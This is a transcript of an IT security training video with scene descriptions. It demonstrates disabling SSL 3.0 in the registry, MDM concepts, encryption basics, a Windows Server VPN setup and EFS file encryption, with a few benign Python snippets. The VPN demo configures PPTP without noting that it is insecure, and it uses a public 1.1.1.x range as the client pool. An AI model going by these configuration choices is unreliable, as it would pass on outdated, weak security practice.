Protocols, I'm going to build some new items. I'm going to right-click on Protocols, choose New > Key and I'm
going to call it SSL 3.0. Under which, I'll then create another key and it's going to be called Server, because
we're configuring the server aspect of it.
[Video description begins] He right-clicks the SSL 3.0 folder and a shortcut menu appears which includes the
New option. He hovers over the New option and a flyout menu appears. It includes Key, String Value and
Binary Value options. [Video description ends]
And then I'm going to configure a DWORD value here under Server, so I'll right-click on that, New >
DWORD (32-bit) Value.
[Video description begins] He selects the Key option. A new folder appears under the SSL 3.0 folder and he
names it Server. [Video description ends]
[Video description begins] He right-clicks the Server folder and a shortcut menu appears. He hovers over the
New option and a flyout menu appears. He clicks the DWORD (32-bit) Value option. A new row appears. The
values REG_DWORD and 0x00000000 (0) appear under the Type and Data column headers. He enters the
value DisabledByDefault under the Name column header. The Edit DWORD (32-bit) Value dialog box opens.
It includes Value name and Value data text boxes. It includes Base section with two radio buttons,
Hexadecimal and Decimal and OK and Cancel buttons. The value DisabledByDefault is displayed in the
Value name text box and the Hexadecimal radio button is selected. [Video description ends]
[Video description begins] He enters the value 1 in the Value data text box and clicks the OK button and the
Edit DWORD (32-bit) Value dialog box closes. The value under the Data column header changes from
0x00000000 (0) to 0x00000001 (1). [Video description ends]
And I'm going to add another item here, I'll build another new DWORD value. This one is going to be called
Enabled and we're going to leave that at a value of 0.
[Video description begins] He right-clicks the Server folder and a shortcut menu appears. He hovers over the
New option and a flyout menu appears. He clicks the DWORD (32-bit) Value option and a new row appears.
The values REG_DWORD and 0x00000000 (0) appear under the Type and Data column headers. He enters
the value Enabled under the Name column header. [Video description ends]
So in other words, SSL 3.0 is not enabled. Now, you want to be careful when you do this type of thing because
depending on what other components need to talk to the web server, like older versions of Microsoft SQL
Server, older web browsers, and whatnot, they might need to see SSL 3 on the server to function properly.
But at the same time, there are a lot of known vulnerabilities. So ideally, it shouldn't be used and you should
upgrade the components that might require SSL 3.
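If you had to apply this to many servers, you could script the same registry change. Here is a minimal Python sketch using the standard winreg module; it assumes it is run as Administrator on the Windows server, and the server still needs to be restarted for Schannel to pick up the change:

import winreg

path = r"SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\SSL 3.0\Server"

# Create (or open) the SSL 3.0\Server key and set the same two values shown in the demo.
with winreg.CreateKeyEx(winreg.HKEY_LOCAL_MACHINE, path) as key:
    winreg.SetValueEx(key, "DisabledByDefault", 0, winreg.REG_DWORD, 1)
    winreg.SetValueEx(key, "Enabled", 0, winreg.REG_DWORD, 0)

print("SSL 3.0 disabled for the server side; restart the server to apply.")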
Now, we could do the same thing for enabling TLS, Transport Layer Security, which supersedes SSL by
adding the appropriate keys and values here in the registry, and then of course restarting the server. Then there
is the web browser side, so let's take a peek at that. I'm going to fire up Internet Explorer on this server. And
the first thing I'm going to do is enter http:// and then this hostname. And notice we have access to it, but this is
not an HTTPS or a secured connection, so it's not even trying to use SSL or TLS.
[Video description begins] The host name is srv2016-1.fakedomain1.local/. [Video description ends]
Now, I know that it's configured on my server, so I'm going to change the URL prefix to https. Now we get a
message that the page can't be displayed, and it suggests taking a look at the settings here in the browser. Okay,
I'll do that. I'm going to go ahead and click the settings icon in the upper right here in Internet Explorer. I'm
going to go down to Internet options. Then I'm going to go to the Advanced tab and kind
of scroll down under the Security section, and notice that we don't have any check marks for SSL 3.
[Video description begins] The Internet Options dialog box opens. It contains seven tabs: General, Security,
Privacy, Content, Connections, Programs, and Advanced. He clicks the Advanced tab. It includes a Settings
section, which includes Use SSL 3.0, Use TLS 1.0, and Use TLS 1.1 checkboxes and Restore advanced settings
button. It also includes the Reset Internet Explorer settings section, which includes a Reset button. [Video
description ends]
Well, that is good. But we also don't have any for TLS. So for example, I should really stay away from TLS
1.0 too. So I'll turn on the check marks to use TLS 1.1 and 1.2. Again, the only time you might turn on the
other ones is if you absolutely have no choice for backwards compatibility. But I do have a choice here, so I'm
not turning those on. I'm going to click OK and I'm going to refresh this page again.
[Video description begins] The Internet Options dialog box closes. [Video description ends]
So there is a negotiation. There is a handshake when a web browser tries to make a secured connection to some
kind of a secured server, in this case, a web server over HTTPS. And both of the ends of the connection, the
server and the client, ideally have to agree on the highest level of security that both support. And that is where
a lot of attacks in the past have kicked in: attackers can force that handshake to downgrade the security, for
example down to SSL 3, during the negotiation so they can take advantage of its vulnerabilities. That is not the
case here the way we've configured it.
Objectives
explain how centralized mobile device control can secure the environment
[Video description begins] Topic title: Mobile Device Access Control. The presenter is Dan Lachance. [Video
description ends]
These days, mobile device usage is ubiquitous, it is everywhere. Whether you're talking about a laptop, a
tablet, and certainly that is the case with smartphones. Now, the problem with mobile devices, yes, they do
allow people to be productive, even when they're out of the office. However, it can introduce organizational
security risks.
Especially in the case of BYOD, bring your own device, where users can use their personal mobile device like
a laptop or a smartphone, and they can use that against the organization's systems. They can do work using their
personal system. The problem with this is that the IT department didn't have a chance to set this up from the
beginning and secure every aspect of it. And that personal device is also going to be connected to home
networks that might not be secured or public Wi-Fi hotspots and so on. And so malware could be introduced to
it which in turn could infect an organization production network when that mobile device connects. So, what
do we do about this?
We can use a mobile device management, or an MDM solution. This is a centralized way for us to manage a
multitude of mobile devices. Such as iOS smartphones, or Android smartphones, or Windows phones, it
doesn't matter. Now, in the case of Microsoft, we can do this to a degree using System Center Configuration
Manager, SCCM. Now, this integrates with Microsoft Intune, which is designed for mobile device
management. So from a central management pane, we can deploy policies that lock down mobile devices. And
we can also control which apps get installed on the devices and so on.
Another aspect of mobile device access control is captive portals. Now this isn't really specific to mobile
devices but it's a web page that a user needs to interact with prior to getting on the Internet. And I'm sure
you've seen this if you have connected to a public Wi-Fi hotspot, such as in a coffee shop. You might have to
know a password before you're allowed out to the Internet and we're not talking about the Wi-Fi network
connection password. We're talking about after you're on the Wi-Fi network and you fire up a web browser.
You might have to specify credentials or you might only have to agree to acceptable use settings on that
network and then proceed before you get a connection to the Internet.
That is a captive portal. So it may or may not require credentials. The other thing to consider with mobile
devices is PKI certificates. These are security certificates that can be issued to users, devices, or software. So
we might have devices like smartphones authenticate to a VPN only if the smartphone has a unique identifier,
a PKI certificate that is trusted by the VPN configuration. That way, even if the user is issued a different
phone, if the device certificate doesn't go along with it or if a new valid one isn't issued, the user will not be
able to get on to the VPN. So it's an additional layer of security. We should also consider network isolation for
mobile devices.
So for example, if we're going to allow bring your own device, BYOD, where employees can use their own
personal smartphones, let's say. We might want to make sure when they're at work that they're on an isolated
network as opposed to being connected directly to a network with sensitive data. We can also enable MAC
address whitelisting prior to allowing access to the network. Whether it's done at the wireless network level or
whether it's done through a wired switch that supports 802.1X authentication. Now, this isn't specific to mobile
devices. The same thing could be done for servers and desktops and any type of device, including IoT devices,
they all have a MAC address.
This is a unique 48-bit hexadecimal hardware address. However, it can easily be spoofed with freely available
tools, just like IP addresses can be spoofed. However, that doesn't mean it shouldn't be a part of our security
strategy, as one of multiple layers we use to enhance security. Also, this might not be scalable
for anonymous guest networks because you're always going to have new devices connecting, you don't already
know their MAC addresses ahead of time. So an example of where MAC address whitelisting would not be
suitable would be at a car dealership where we have a waiting room for customers as their cars are being
repaired or as the paperwork is being drawn up for their purchase of a new vehicle.
Well, we always have different customers in and we don't know what the MAC addresses are ahead of time.
So MAC address whitelisting doesn't make sense. But what would make sense in that aspect for those mobile
devices is to have a guest-isolated network that has no connectivity to the production network at that car
dealership. We can also configure mobile device settings using our centralized mobile device management
tool. And that way, we don't have to run around and configure these security settings one by one on every
device. That includes things like turning off the microphone or the camera, or maybe disabling GPS location
services on the device.
Enabling device encryption or remote wipe should the device be lost or stolen, and we want to remove any
sensitive data from it. We can also schedule malware engine and definition updates, and again, that is not
really specific to mobile devices. Same thing would be applicable to servers, to desktops, to laptops, to really
any operating system, whether it be physical or virtual. Any type of device should always have malware
definition protection on it. However, what is important is that we bear in mind that a lot of people don't really
think of smartphones as computers, and as such there might not be an anti-virus solution installed on them. It's
absolutely crucial, because there is plenty of malware for smartphones. Remember, there are more smartphone
users around the world than users of any other type of device, so certainly the bad guys are focusing on that.
So we can schedule malware scans. We can also restrict the ability of users to install mobile device apps. Or
we might have a very limited list of mobile device apps that users are allowed to install, trusted business apps.
We can also centrally configure password and authentication settings to make it harder for malicious users to
crack into a stolen smartphone, for example. We should also have a way to gather centralized inventory in
terms of hardware. So the types of devices we have and their details along with the software installed in all the
devices. This way, at any point in time, we might be able to detect any anomalies in terms of software that is
installed on devices that isn't licensed or might present a security risk to the organization.
Objectives
[Video description begins] Topic title: Data Confidentiality. The presenter is Dan Lachance. [Video
description ends]
Data confidentiality has always been a big deal, and certainly it's one of the focal points of cybersecurity.
However, these days, where we have so many devices interconnected over the Internet, data confidentiality is
even more relevant than it ever has been. So data confidentiality really means that we're going to protect
sensitive data through encryption. The original source data is called plain text. After the data is encrypted or
scrambled, it's called cipher text. Let's take a look at the encryption process. So we start with plain text. In this
example, it simply says The quick brown fox. Let's assume that that is sensitive information that we want to
protect. So what we would then do is take that plain text and feed it into an encryption algorithm with a key,
which results in cipher text. In other words, the encrypted data or the scrambled data.
Now, an encryption algorithm is really a mathematical function, and we'll talk about keys. A key may or may
not be unique, and it's the mathematical value that is fed into the algorithm along with the plain text to produce
that unique cipher text. Of course, decryption happens in the opposite direction, given that we have the
correct decryption key. Symmetric encryption is a type of encryption where only one unique key is used. It
gets called a secret key because there is only one, and it can encrypt and it can also decrypt. So this secret key
then has a couple of problems. One is how we can securely distribute this secret key over a network, especially
on a large scale such as over the Internet. Secondly, if the key is compromised, then all data encrypted by that
key is also compromised; it can be decrypted.
Talk about having all of your eggs in one basket. So symmetric encryption does have its place when it's used in
conjunction with asymmetric encryption. Asymmetric encryption, as the name implies, uses two different but
mathematically related keys: a public key and a private key. And when we talk about
asymmetric encryption, you'll also often hear it referred to as public key encryption. Now, securely distributing
the public key isn't a problem, that is why it's called a public key. You can give it to anybody and there is no
security risk. But of course, the private key is private to the user device or software to which it was issued, and
it must be kept safe.
Often public and private keys are the result of issuing a PKI security certificate to an entity. So the thing to
bear in mind is that when we need to encrypt something using asymmetric encryption, the target's public key is
what is used to encrypt a message. So if I'm sending an encrypted email message to you, I would need your
public key to encrypt the message for you. Now, the target's private key is what is used to decrypt the message.
So in our example to continue it, you would use your mathematically related private key to decrypt the
message that was encrypted with your related public key.
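As a small illustration of both models, here is a minimal Python sketch that assumes the third-party cryptography package is installed. It is a conceptual demonstration, not a production key-management scheme:

from cryptography.fernet import Fernet
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import rsa, padding

plain_text = b"The quick brown fox"

# Symmetric: a single secret key both encrypts and decrypts.
secret_key = Fernet.generate_key()
f = Fernet(secret_key)
cipher_text = f.encrypt(plain_text)
assert f.decrypt(cipher_text) == plain_text

# Asymmetric: the target's public key encrypts; only the matching private key decrypts.
private_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
public_key = private_key.public_key()
oaep = padding.OAEP(mgf=padding.MGF1(algorithm=hashes.SHA256()),
                    algorithm=hashes.SHA256(), label=None)
cipher_text = public_key.encrypt(plain_text, oaep)
assert private_key.decrypt(cipher_text, oaep) == plain_text
print("Both round trips succeeded.")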
Now, encryption can be applied to data at rest, data that is being stored on storage media. Examples include
things like Microsoft BitLocker which is built into some Windows editions such as Windows 10 Enterprise.
And it allows the encryption of entire disk volumes. We've also got Microsoft Encrypting File System, EFS,
which is different from BitLocker because you can cherry-pick the files and folders that you want to encrypt.
And it's tied to the user account, whereas BitLocker is tied to the machine. Depending on the cloud provider we
might be using, like Microsoft Azure or Amazon Web Services or Google Cloud and so on, we also have
options for server side encryption when we store our data in the cloud.
But we can also encrypt data as it's being transmitted over the network, and there are many ways to do this,
such as using a VPN, a virtual private network. This allows a user that is working remotely to have an
encrypted connection over the Internet to a private network elsewhere, such as at work. Encrypting data using
Hypertext Transfer Protocol Secure, HTTPS, is everywhere, it's used all the time. And in order for this to
work, the web server needs to have been issued a PKI security certificate. I'm not going to call it an SSL or
TLS certificate, because SSL and TLS are really methods of exchanging keys over a network. They're really
not tied to the certificate itself.
So I can use a PKI certificate on a web server that is configured for SSL, which shouldn't be done because SSL
is not secure and is deprecated. I could use the exact same certificate, though, just as an example, on a different
web server configured for TLS. Now, as long as the server has the correct name or IP address that is in the
certificate, it would work fine. So the certificate is not tied to SSL or TLS. These are protocol settings that are
configured on the server as well as on the web browser side of the connection.
Now, we can also secure data in transit when we are remotely administering network devices like routers or
switches or printers or Unix or Linux hosts, or even Windows machines, if we install an SSH daemon on it.
We can use Secure Shell, SSH, to do that. Secure Shell provides an encrypted connection over a network that
is designed to do what we just described: perform remote administration at the command line level.
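As a small illustration, assuming the third-party Python paramiko library is installed, and with the host name, user name, key file, and command below as placeholders:

import paramiko

client = paramiko.SSHClient()
client.load_system_host_keys()        # trust hosts the system already knows about

# Everything on this connection, including the command and its output, is encrypted.
client.connect("router1.example.com", username="admin",
               key_filename="/home/admin/.ssh/id_ed25519")
stdin, stdout, stderr = client.exec_command("show running-config")
print(stdout.read().decode())
client.close()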
Objectives
We've talked about protecting data at rest and also protecting data in motion. Now it's time to see how to
actually do that. Specifically, protecting data in motion. We're going to set up a very simple VPN environment
here on Microsoft Windows Server 2016. Which would allow users working remotely to establish an
encrypted VPN tunnel over the Internet. So that everything they send over the Internet to the private network
here at work is encrypted, it's protected. To get started here in server 2016, I'm going to go to my Start menu,
and I'm going to fire up the Server Manager. Because I need to make sure the appropriate component or role
services are installed before I go and configure a VPN. So I'm going to click Add roles and features,
[Video description begins] The Server Manager - Dashboard window is open. It is divided into three parts.
The first part includes four menus: Manage, Tools, View, and Help. The second part includes Dashboard,
Local Server, All Servers, and IIS options. The Dashboard option is selected. The third part includes different
sections. The WELCOME TO SERVER MANAGER section includes a box. The box is divided into two parts.
The first part contains three options: QUICK START, WHAT'S NEW, and LEARN MORE. The QUICK START
option is selected and its contents are displayed in the second part. It contains Configure this local server, Add
roles and features, Add other servers to manage, Create a server group, and Connect this server to cloud
services links. The ROLES AND SERVER GROUPS section includes AD DS, DNS, and File and Storage
Services tiles. [Video description ends]
[Video description begins] The Add Roles and Features Wizard opens. It is divided into two parts. The first
part contains Before You Begin, Installation Type, Server Selection, Server Roles, Features, Confirmation, and
Results options. The second part displays the contents corresponding to the option in the first part. The wizard
also includes four buttons: Previous, Next, Install, and Cancel. The Before You Begin option is
selected. [Video description ends]
since I know I want to install something on the local server from where I'm running this.
[Video description begins] He clicks the Next button and the Installation Type page opens. He clicks the Next
button and the Server Selection page opens. He clicks the Next button and the Server Roles page opens. The
page includes Roles and Description of the selected role. Roles includes Active Directory Certificate Services,
DHCP Server, File and Storage Services (3 of 12 installed), and Remote Access checkboxes. [Video
description ends]
And I'm interested here in the Remote Access side of things on the server, the Remote Access role. I'm going
to go ahead and turn that on.
[Video description begins] He selects the Remote Access checkbox and the corresponding description
displays. [Video description ends]
After a moment, it'll turn on the check mark. Over on the right I can see it's describing that it allows things like
DirectAccess, VPN, Web Application Proxy.
[Video description begins] He points to the description of the Remote Access checkbox. [Video description
ends]
So we want the VPN aspect, so I'm going to go ahead and click Next. I don't need any additional features, so
I'll just proceed beyond this.
[Video description begins] The Select features page opens. It includes Features and the Description of the
selected feature. Features includes .NET Framework 3.5 Features (1 of 3 installed), .NET Framework 4.6
Features (4 of 7 installed), BitLocker Drive Encryption, and Group Policy Management (Installed)
checkboxes. [Video description ends]
[Video description begins] He clicks the Next button and the Remote Access page opens. He clicks the Next
button and the Select role services page opens. It includes Role services and the Description of selected role
service. Role services contains three checkboxes: DirectAccess and VPN (RAS), Routing, and Web Application
Proxy. [Video description ends]
I'll select DirectAccess and VPN (RAS) because that is what I want. I'm going to add the features for management tools
[Video description begins] The Add Roles and Features Wizard opens. It includes Include management tools
(if applicable) checkbox and Add Features and Cancel buttons. [Video description ends]
and I will proceed again by clicking Next and then finally, Install.
[Video description begins] He clicks the Add Features button and the Add Roles and Features Wizard
closes. [Video description ends]
[Video description begins] He clicks the Next button and the Confirm installation selections page opens. He
clicks the Install button and the Installation progress page opens. [Video description ends]
We wait for this to be installed before we can begin configuring our server side VPN. Okay, before too long
the installation will be completed. So I'm going to go ahead and click Close.
[Video description begins] The Add Roles and Features Wizard closes. [Video description ends]
Then here in the Server Manager tool, I'll go to the Tools menu so we can start configuring this. I'm interested
in the Remote Access Management tool. Now in here, I can configure a VPN among other things like direct
access or the web application proxy, and so on.
[Video description begins] The Remote Access Management Console window opens. It is divided into three
parts. The first part is the navigation pane, which includes the Configuration and Srv2016-1 options. The
Configuration option includes DirectAccess and VPN sub option. The second part is the content pane. The
third part is the Tasks pane, which includes the General option. It further includes Manage a Remote Server
and Refresh Installed Roles sub options. [Video description ends]
I can also configure my VPN in the Routing and Remote Access tool. So if I were to, let's say, minimize this
and go back into Tools, I also have a Routing and Remote Access tool. Now this is an older tool that you might
already be familiar with if you've got experience with previous versions of the Windows Server operating
system. I'm going to go ahead and use this one.
[Video description begins] The Routing and Remote Access window opens. It is divided into four parts. The
first part is the menu bar. The second part is the Toolbar. The third part contains the Routing and Remote
Access root node, which contains the Server Status and SRV2016-1 (local) options. The SRV2016-1 (local)
option is selected. The Welcome to Routing and Remote Access page is open in the fourth part. [Video
description ends]
So over on the left I can see my server name with a little red down-pointing arrow because routing and remote
access has not yet been configured. And we are going to configure a VPN here, so I'm going to right-click and
choose Configure and Enable Routing and Remote Access.
[Video description begins] The Routing and Remote Access Server Setup Wizard opens. [Video description
ends]
[Video description begins] The Configuration page opens. It contains five radio buttons: Remote access (dial-
up or VPN), Network address translation (NAT), Virtual private network (VPN) access and NAT, Secure
connection between two private networks, and Custom configuration. [Video description ends]
Now, normally, you would have at least two network cards in your VPN host, whether it's physical or virtual.
One network card connected to a public-facing network that is reachable from the Internet, that users would
connect to to establish the VPN tunnel. And the second card, and maybe more than just two cards, would
connect to internal networks to allow that connectivity. So here I've only got one network card, so to proceed
with this example, to configure the VPN, I'm going to have to choose Custom configuration here in the wizard,
instead of Remote access (dial-up or VPN). So having done that, I'll click Next. I'm going to turn on VPN
access.
[Video description begins] The Custom Configuration page opens. It contains five checkboxes: VPN access,
Dial-up access, Demand-dial connections (used for branch office routing), NAT, and LAN routing. [Video
description ends]
[Video description begins] The Completing the Routing and Remote Access Server Setup Wizard page
opens. [Video description ends]
Now what I've done at this point is configured a PPTP, or a Point to Point Tunneling Protocol VPN.
[Video description begins] He clicks the finish button and the Routing and Remote Access dialog box opens. It
contains Start service and Cancel buttons. [Video description ends]
There are many other types of VPNs, like SSL VPNs, which require a PKI certificate. We could also have
configured a Layer 2 Tunneling Protocol (L2TP) VPN, and so on. So here I am just going to click Start service to get
this up and running.
[Video description begins] The Routing and Remote Access dialog box closes. [Video description ends]
The only other thing I really should do is determine which IP addresses I want to hand out to VPN clients.
[Video description begins] The Routing and Remote Access Server Setup Wizard closes. [Video description
ends]
So for that I am going to right-click on my server in the left-hand navigator and I am going to go into
Properties, IPv4.
[Video description begins] The SRV2016-1 (local) Properties dialog box opens. It contains seven tabs:
General, Security, IPv4, IPv6, IKEv2, PPP, and Logging. He selects the IPv4 tab. It includes Enable IPv4
Forwarding checkbox, which is selected. It also includes the IPv4 address assignment section, which further
includes Dynamic Host Configuration Protocol (DHCP) and Static address pool radio buttons. This section
also includes a table with five column headers: From, To, Number, IP Addresses, and Mask and Add, Edit,
and Remove buttons. The IPv4 tab also includes Enable broadcast name resolution checkbox and Adapter
drop-down list box. Allow RAS to select adapter option is selected in the Adapter drop-down list box. [Video
description ends]
And what I want to do is use a Static address pool for VPN clients, I'll click Add. Let's say, I want to give them
an address starting at 1.1.1.1
[Video description begins] He selects the Static address pool radio button and clicks the Add button. The New
IPv4 Address Range dialog box opens. It contains Start IP address, End IP address, and Number of addresses
fields and OK and Cancel buttons. [Video description ends]
through to 1.1.1.50. That way I have a unique range that identifies VPN clients if I happen to be taking a look
at which devices are on the network.
[Video description begins] He enters the values 1.1.1.1 and 1.1.1.50 in the Start IP address and End IP
address fields, respectively. The Number of addresses field displays the value 50. [Video description ends]
[Video description begins] The New IPv4 Address Range dialog box closes. [Video description ends]
The other thing to watch out for is to make sure that users that will be authenticating to the VPN are allowed to
do that.
[Video description begins] The SRV2016-1 (local) Properties dialog box closes. [Video description ends]
So here in the Windows world I'm going to go back to my Start menu. I've got Microsoft Active Directory
configured, so I'm going to go ahead and start the Active Directory Users and Computers tool. Because in here
is one way that I can enable remote access to make sure that users are allowed to establish a VPN connection.
So here I've got a user called User One.
[Video description begins] The Active Directory Users and Computers window opens. It is divided into four
parts. The first part is the menu bar. The second part is the Toolbar. The third part contains the Active
Directory Users and Computers root node. It contains two nodes, Saved Queries and fakedomain1.local. The
fakedomain1.local is expanded and it includes Admins, Computers, and LasVegas subnodes. The LasVegas
subnode further contains Computers and Groups subnodes and Users folder. A table with Name, Type, and
Description column headers and one row is displayed in the fourth part. The values User One and User are
displayed under the Name and Type column headers. [Video description ends]
So I'm just going to right-click and go over to the Properties for that account. And what I'm really interested in
here is the Dial-in tab.
[Video description begins] The User One Properties dialog box opens. It includes General, Address, Account,
and Profile tabs. The General tab is selected. It includes First name, Initials, Last name, and Display name
text boxes. [Video description ends]
I want to make sure that Network Access Permission is allowed.
[Video description begins] He clicks the Dial-in tab. The Dial-in tab is divided into four sections: Network
Access Permission, Callback Options, Assign Static IP Addresses, and Apply Static Routes. The Network
Access Permission section includes Allow access, Deny access, and Control access through NPS Network
Policy radio buttons. The Callback Options include No Callback, Set by Caller (Routing and Remote Access
Service only), and Always Callback to radio buttons and a text box adjacent to the Always Callback to radio
button. [Video description ends]
Notice here it could be denied, and we could also control it through a network policy as opposed to having to
do it within each individual user account. But at this level, notice that access is in fact allowed. I'm going to
go ahead and click OK.
[Video description begins] The User One Properties dialog box closes. [Video description ends]
Next, I'll configure the client side of the VPN connection here on Windows 10, where the first thing I'll do is
go to my Start menu and search for Settings. Now I'm going to go into Settings on my machine, then I'll go
into Network & Internet.
[Video description begins] The Windows Settings window opens. It includes Network & Internet, System,
Devices, and Accounts options. [Video description ends]
And I'm very interested in creating a new connection, so I'll start by clicking Change adapter options.
[Video description begins] The Network & Internet page opens. It is divided into two parts. The first part
includes Home, Status, Wi-Fi, Ethernet, and VPN options and a Find a settings search box. The second part
displays the contents of the corresponding option in the first part. The Status option is selected and its content
is displayed in the second part. It includes different sections. The Change your network settings section
contains three options: Change adapter options, Sharing options, and Network troubleshooter. It also includes
Network and Sharing Center and Windows Firewall links. [Video description ends]
Here we can see any network adapters that are configured on this machine.
[Video description begins] The Network Connections window opens. It includes Bluetooth Network
Connection, Ethernet, Ethernet 2, and Wi-Fi options. [Video description ends]
Well when you configure a VPN, you're going to end up configuring a new adapter that shows up here, a
logical adapter. So the next thing I'll do here on Windows 10 is add a new network connection.
[Video description begins] He closes the Network Connections window. [Video description ends]
So to do that I'm going to go to the Network and Sharing Center, and I'm going to choose Set up a new
connection or network.
[Video description begins] The Network and Sharing Center window opens. It is divided into two parts. The
first part includes Control Panel Home, Change adapter settings, Media streaming options, Infrared, and
Internet Options links. The second part is divided into two sections. The first section is the View your active
networks and the second section is the Change your networking settings. The Change your networking settings
contains Set up a new connection or network and Troubleshoot problems links. [Video description ends]
I'm going to use my Internet connection; you need to be on the Internet to establish a VPN link to the public
interface of the VPN host.
[Video description begins] The Connect to a Workplace wizard opens. It includes two options: Use my Internet
connection (VPN) and Dial directly. It also includes Cancel button. [Video description ends]
So now I have to specify the address or name that resolves to an IP address of that host.
[Video description begins] He selects the Use my Internet connection (VPN) option. The Type the Internet
address to connect to page opens. It includes Internet address and Destination name text boxes and Use a
smart card, Remember my credentials, and Allow other people to use this connection checkboxes. The
Destination name text box displays the value VPN Connection. The Remember my credentials checkbox is
selected. It also includes Create and Cancel buttons. [Video description ends]
So I've popped in the IP address of that VPN server. I'm going to leave the Destination name here just called
VPN Connection.
[Video description begins] He enters the value 192.168.0.231 in the Internet address text box. [Video
description ends]
I'm not using a smart card for authentication although that is a great way to further secure your environment.
[Video description begins] He unchecks the Remember my credentials checkbox. [Video description ends]
And I certainly don't want to remember my credentials and I'll just click Create.
[Video description begins] The Type the Internet address to connect to page closes. [Video description ends]
So if we were to go back and look at our adapters, we're going to see that we've now got that virtual adapter I
was talking about.
[Video description begins] He clicks the Change adapter settings link and the Network Connections window
opens again. [Video description ends]
It's called VPN Connection, because that is what we named it. And we're currently disconnected, so we're
going to go ahead and right-click and go into the Properties.
[Video description begins] He points to the VPN Connection option. [Video description ends]
Because one of the things I want to do under Security is specify that we're using a Point to Point Tunneling
Protocol (PPTP) VPN. And then I'm going to right-click and choose Connect on that adapter.
[Video description begins] The VPN Connection Properties dialog box opens. It contains five tabs: General,
Options, Security, Networking, and Sharing. He clicks the Security tab and it includes Type of VPN and Data
encryption drop-down list boxes. He clicks the Type of VPN drop-down list and selects the Point to Point
Tunneling Protocol (PPTP) option. He clicks the OK button and the VPN Connection Properties dialog box
closes. [Video description ends]
And I'm going to select the VPN Connection and choose Connect.
[Video description begins] He right-clicks the VPN Connection option in the Network Connections window
and a panel appears, which includes Npcap Loopback Adapter, VPN Connection, and ARRIS-17BB-Basement
options. [Video description ends]
So at this point it's asking me for credentials, so I'm going to go ahead and specify let's say user one's name and
password.
[Video description begins] The Sign in dialog box opens. It contains User name and Password text boxes and
OK and Cancel buttons. [Video description ends]
And once I've done that we can see that we now have a valid connection.
[Video description begins] He enters the value Uone in the User name text box. [Video description ends]
Well, if I just take a look here at the status when I right-click on it, we could see that we've got some
information being transmitted through this VPN connection.
[Video description begins] He points to the VPN Connection option. [Video description ends]
And from a Command Prompt, if I were to type ipconfig, we would see that we've got our VPN connection
listed here.
[Video description begins] He right-clicks the VPN Connection option and clicks the Status option. The VPN
Connection Status dialog box opens. It contains two tabs, General and Details. The General tab is selected. It
is divided into two sections, Connection and Activity, which display information about the VPN
connection. [Video description ends]
[Video description begins] He opens the Command Prompt window. It displays the C:\Users\danla>
prompt. [Video description ends]
Right here, VPN connection listed as another adapter with an IP address within the space that we configured.
[Video description begins] He points to the PPP adapter VPN Connection and 1.1.1.2 IPv4 address in the
command prompt window. [Video description ends]
[Video description begins] Topic title: Implement Encryption for Data at Rest. The presenter is Dan
Lachance. [Video description ends]
In this demonstration, I'll implement encryption for data at rest. And I'll be using Microsoft Encrypting File
System, or EFS, to do it. EFS is a part of the Windows operating system, but you won't find it in some editions
of Windows client operating systems, like Windows 10 Home. However, here on my Windows server, I've got
some sample files, and I want to encrypt one of them.
[Video description begins] The File Explorer window is open. It is divided into two parts. The first part is the
navigation pane and it includes Downloads and Documents options and Logs and 2017_Patients folders. The
second part contains four files: PHI_Automation_Test.txt, PHI-YHZ-004-0456-007.xls, PHI-YHZ-004-0456-
008.xls, and PHI-YHZ-004-0456-009.xls. [Video description ends]
What I'm going to do is right-click on the file I want to encrypt and choose Properties.
[Video description begins] He right-clicks the PHI-YHZ-004-0456-009.xls file, a shortcut menu appears and
he selects the Properties option. The PHI-YHZ-004-0456-009.xls Properties dialog box opens. It contains five
tabs: General, Classification, Security, Details, and Previous Versions. The General tab is selected and it
displays information about the PHI-YHZ-004-0456-009.xls file, which includes Type of file, Location, Size on
disk, and Created. It also includes two Attributes checkboxes, Read-only and Hidden. It also includes
Advanced, OK, Cancel, and Apply buttons. [Video description ends]
From here, I can go to the Advanced button, and in the Advanced Attributes down at the bottom, I can choose
to either compress or encrypt the file, not both.
[Video description begins] The Advanced Attributes dialog box opens. It is divided in two sections, File
attributes and Compress or Encrypt attributes and it includes OK and Cancel buttons. The File attributes
section contains two checkboxes, File is ready for archiving and Allow this file to have contents indexed in
addition to file properties. Both the checkboxes are checked. The Compress or Encrypt attributes section
contains two checkboxes, Compress contents to save disk space and Encrypt contents to secure data and
Details button. [Video description ends]
I'm going to choose Encrypt contents to secure data, and I'll click OK twice.
[Video description begins] He clicks OK and the Advanced Attributes dialog box closes. He again clicks OK
and the PHI-YHZ-004-0456-009.xls Properties dialog box closes. [Video description ends]
After a moment, we should be able to see that we've got a tiny golden padlock icon on that file icon, which
implies that the file is in fact encrypted. Now it's encrypted and tied to the user that's currently logged in.
[Video description begins] He points to the PHI-YHZ-004-0456-009.xls file. [Video description ends]
So I'm going to fire up the Start menu here on my machine, and I'm going to type certmgr.msc. That will start
the certificate manager Microsoft console built in to Windows. Now when I do that, I can examine my
certificates.
[Video description begins] The certmgr – [Certificates – Current User] window opens. It is divided into three
parts. The first part is the Toolbar. The second part contains the Certificates – Current User root node, which
includes Personal, Enterprise Trust, Trusted People, and Other People nodes. The third part displays the
contents of the option selected in the second part. [Video description ends]
Now what does that have to do with EFS? Well, if you didn't already have a certificate prior to encrypting your
first file with EFS, the operating system will make one for you. So it will be here under Personal>Certificates.
[Video description begins] He clicks the Certificates folder under the Personal node and a table is displayed
in the third part. The table includes Issued To, Issued By, Expiration Date, Intended Purposes, and Friendly
Name column headers and two rows. The values Administrator, Administrator, 10/15/2116, File Recovery,
and <None> are displayed in the first row and values Administrator, Administrator, 11/12/2118, Encrypting
File System, and <None> are displayed in the second row under the Issued To, Issued By, Expiration Date,
Intended Purposes, and Friendly Name column headers, respectively. [Video description ends]
Now this is for the current user, as we can see. And notice that I've got an encrypting file system, or EFS
certificate here, issued to user Administrator, which is who I'm currently logged in as. I can just pop that up by
double-clicking if I want to see any further details on any of these. What I'm interested in looking at here, is
looking at the validity date.
[Video description begins] He double-clicks the Administrator value in the second row under the Issued To
column header and the Certificate dialog box opens. It contains three tabs: General, Details, and Certification
Path. The General tab is selected and it displays the Certificate Information. It also includes the Issuer
Statement button. [Video description ends]
[Video description begins] He points to the information: Valid from 12/6/2018 to 11/12/2118. [Video
description ends]
And in this case, it tells me I've got a private key that corresponds to the certificate as well.
